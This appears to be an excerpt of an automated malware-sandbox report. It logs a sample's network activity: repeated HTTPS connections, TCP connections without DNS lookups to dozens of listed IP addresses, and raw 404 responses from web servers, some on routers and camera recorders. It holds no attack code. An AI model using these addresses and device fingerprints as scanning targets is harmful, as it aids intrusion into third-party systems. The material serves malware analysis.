    Source: unknownNetwork traffic detected: HTTP traffic on port 46608 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38220 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57012
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56166
    Source: unknownNetwork traffic detected: HTTP traffic on port 35756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51124 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50864
    Source: unknownNetwork traffic detected: HTTP traffic on port 46082 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34418 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45466 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46338
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44154
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37860
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36524
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34354
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35684
    Source: unknownNetwork traffic detected: HTTP traffic on port 43584 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
    Source: unknownNetwork traffic detected: HTTP traffic on port 41896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44144
    Source: unknownNetwork traffic detected: HTTP traffic on port 47064 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36522
    Source: unknownNetwork traffic detected: HTTP traffic on port 50348 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37844
    Source: unknownNetwork traffic detected: HTTP traffic on port 40398 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34340
    Source: unknownNetwork traffic detected: HTTP traffic on port 52908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46402 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 37500 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45466
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45062
    Source: unknownNetwork traffic detected: HTTP traffic on port 56020 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48570
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55268
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35258
    Source: unknownNetwork traffic detected: HTTP traffic on port 57758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36108
    Source: unknownNetwork traffic detected: HTTP traffic on port 40536 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58502 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48494 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49414
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48566
    Source: unknownNetwork traffic detected: HTTP traffic on port 46252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 32996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45970 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56126
    Source: unknownNetwork traffic detected: HTTP traffic on port 54896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60622
    Source: unknownNetwork traffic detected: HTTP traffic on port 52726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 32890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 38358 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42122 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36572
    Source: unknownNetwork traffic detected: HTTP traffic on port 34878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38752
    Source: unknownNetwork traffic detected: HTTP traffic on port 47406 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55298
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37418
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59650
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46364
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47696
    Source: unknownNetwork traffic detected: HTTP traffic on port 35586 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42062 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37606 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34388
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57004
    Source: unknownNetwork traffic detected: HTTP traffic on port 49532 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58334
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37406
    Source: unknownNetwork traffic detected: HTTP traffic on port 49450 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49466
    Source: unknownNetwork traffic detected: HTTP traffic on port 36666 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49464
    Source: unknownNetwork traffic detected: HTTP traffic on port 52108 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39660
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37486
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51786
    Source: unknownNetwork traffic detected: HTTP traffic on port 58578 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57096
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41976
    Source: unknownNetwork traffic detected: HTTP traffic on port 50924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49450
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37474
    Source: unknownNetwork traffic detected: HTTP traffic on port 38922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60266
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38318
    Source: unknownNetwork traffic detected: HTTP traffic on port 41130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59286
    Source: unknownNetwork traffic detected: HTTP traffic on port 53486 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39244 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45086
    Source: unknownNetwork traffic detected: HTTP traffic on port 51912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51320
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 79.4.215.45
    Source: unknownTCP traffic detected without corresponding DNS query: 42.150.13.65
    Source: unknownTCP traffic detected without corresponding DNS query: 94.173.230.55
    Source: unknownTCP traffic detected without corresponding DNS query: 42.233.184.219
    Source: unknownTCP traffic detected without corresponding DNS query: 37.139.78.108
    Source: unknownTCP traffic detected without corresponding DNS query: 2.42.146.74
    Source: unknownTCP traffic detected without corresponding DNS query: 94.197.255.198
    Source: unknownTCP traffic detected without corresponding DNS query: 79.176.54.67
    Source: unknownTCP traffic detected without corresponding DNS query: 79.77.148.52
    Source: unknownTCP traffic detected without corresponding DNS query: 37.67.106.137
    Source: unknownTCP traffic detected without corresponding DNS query: 79.4.215.45
    Source: unknownTCP traffic detected without corresponding DNS query: 2.38.39.153
    Source: unknownTCP traffic detected without corresponding DNS query: 2.160.155.138
    Source: unknownTCP traffic detected without corresponding DNS query: 118.220.152.103
    Source: unknownTCP traffic detected without corresponding DNS query: 79.166.181.81
    Source: unknownTCP traffic detected without corresponding DNS query: 212.68.89.32
    Source: unknownTCP traffic detected without corresponding DNS query: 178.156.128.30
    Source: unknownTCP traffic detected without corresponding DNS query: 2.160.155.138
    Source: unknownTCP traffic detected without corresponding DNS query: 212.36.91.252
    Source: unknownTCP traffic detected without corresponding DNS query: 42.207.213.92
    Source: unknownTCP traffic detected without corresponding DNS query: 212.68.89.32
    Source: unknownTCP traffic detected without corresponding DNS query: 5.21.65.79
    Source: unknownTCP traffic detected without corresponding DNS query: 94.253.111.83
    Source: unknownTCP traffic detected without corresponding DNS query: 37.67.106.137
    Source: unknownTCP traffic detected without corresponding DNS query: 79.166.181.81
    Source: unknownTCP traffic detected without corresponding DNS query: 2.38.39.153
    Source: unknownTCP traffic detected without corresponding DNS query: 118.2.21.223
    Source: unknownTCP traffic detected without corresponding DNS query: 5.102.69.144
    Source: unknownTCP traffic detected without corresponding DNS query: 109.240.48.21
    Source: unknownTCP traffic detected without corresponding DNS query: 94.221.195.101
    Source: unknownTCP traffic detected without corresponding DNS query: 94.253.111.83
    Source: unknownTCP traffic detected without corresponding DNS query: 79.137.207.21
    Source: unknownTCP traffic detected without corresponding DNS query: 212.36.91.252
    Source: unknownTCP traffic detected without corresponding DNS query: 109.63.92.144
    Source: unknownTCP traffic detected without corresponding DNS query: 109.240.48.21
    Source: unknownTCP traffic detected without corresponding DNS query: 118.220.152.103
    Source: unknownTCP traffic detected without corresponding DNS query: 79.176.54.67
    Source: unknownTCP traffic detected without corresponding DNS query: 109.87.173.235
    Source: unknownTCP traffic detected without corresponding DNS query: 42.207.213.92
    Source: unknownTCP traffic detected without corresponding DNS query: 178.156.128.30
    Source: unknownTCP traffic detected without corresponding DNS query: 79.137.207.21
    Source: unknownTCP traffic detected without corresponding DNS query: 5.21.65.79
    Source: unknownTCP traffic detected without corresponding DNS query: 2.177.189.25
    Source: unknownTCP traffic detected without corresponding DNS query: 5.102.69.144
    Source: unknownTCP traffic detected without corresponding DNS query: 94.25.120.63
    Source: unknownTCP traffic detected without corresponding DNS query: 94.19.31.188
    Source: unknownTCP traffic detected without corresponding DNS query: 94.28.137.205
    Source: unknownTCP traffic detected without corresponding DNS query: 109.158.84.117
    Source: unknownTCP traffic detected without corresponding DNS query: 118.2.21.223
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:19:45 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 14 May 2022 01:18:17 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ZTE web server 1.0 ZTE corp 2015.Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINContent-Type: text/html; charset=iso-8859-1X-Content-Type-Options: nosniffCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 01:08:58 GMTServer: Apache/2.2.15 (Red Hat)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 246Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e ed 21 5a c7 a4 d0 83 10 34 b1 43 02 6e 6a 52 e7 d0 a3 1a 6d 91 c1 96 5c 49 ae db bf af ec 50 c8 65 61 76 e7 0d b3 fc 2e 7f dd d6 ef 55 01 fb fa a5 84 ea bc 29 0f 5b 58 2c 11 0f 45 bd 43 cc eb fc 7a c9 58 8a 58 1c 17 22 e1 3a 74 ad e0 9a a4 8a 22 34 a1 25 b1 4e d7 70 b4 01 76 76 30 8a e3 75 99 70 9c 4d fc c3 aa df 89 5b 89 1b 4f 54 09 ef 45 ad 09 1c 7d 0d e4 03 29 38 9f 4a c0 c6 28 fa 61 bd ee 61 94 1e 4c 44 3e 27 04 ac 81 a0 1b 0f 9e dc 37 39 c6 b1 9f 42 5d 1c 52 29 47 de 8b e7 5e 5e 34 61 c6 32 b6 7a 84 fb 53 4c dc cb f0 00 6f 33 01 32 c0 38 8e 4b 63 5d 27 db 81 a9 46 06 ea 98 a1 00 95 75 01 9e 52 8e ff 49 b1 fb dc 3a f6 9c be 4d fe 00 1b 54 96 8d 28 01 00 00 Data Ascii: Mj0DmN!Z4CnjRm\IPeav.U)[X,ECzXX":t"4%Npvv0upM[OTE})8J(aaLD>'79B]R)G^^4a2zSLo328Kc]'FuRI:MT(
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:19:50 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 189Keep-Alive: timeout=30, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e c1 0e 82 30 10 44 ef 7c c5 ca 1d 16 0d c7 a6 07 05 22 09 22 31 d5 c4 23 d8 15 9a 20 45 5a 24 fe bd a0 17 8f b3 33 6f 66 d9 2a 3a ee c4 b5 88 61 2f 0e 19 14 e7 6d 96 ee c0 f5 10 d3 58 24 88 91 88 7e ce c6 0f 10 e3 dc e5 0e 6b ec a3 e5 ac a1 52 ce c2 2a db 12 0f 83 10 72 6d 21 d1 63 27 19 fe 8e 0e c3 6f 88 55 5a be 17 6e cd ff 32 b3 72 58 cf 45 43 30 d0 73 24 63 49 c2 f9 94 01 de 6a e5 55 aa c3 8b a2 29 d3 b5 5f 9a 1e a6 d2 40 37 c3 f7 05 06 dd 81 6d 94 01 43 c3 8b 06 9f 61 bf 8c 7d 67 e6 e2 e5 3d e7 03 7b f7 ab 8c d9 00 00 00 Data Ascii: M0D|""1# EZ$3of*:a/mX$~kR*rm!c'oUZn2rXEC0s$cIjU)_@7mCa}g={
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:19:49 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:01:48 GMTServer: Apache/2.4.7 (Ubuntu)Content-Length: 281Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 35Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 01:37:54 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:19:18 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 02:26:41 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveETag: "19bb5-a9"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4e 56 52 44 56 52 49 50 43 20 57 65 62 20 53 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>NVRDVRIPC Web Server</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 02:14:38 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:20:11 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
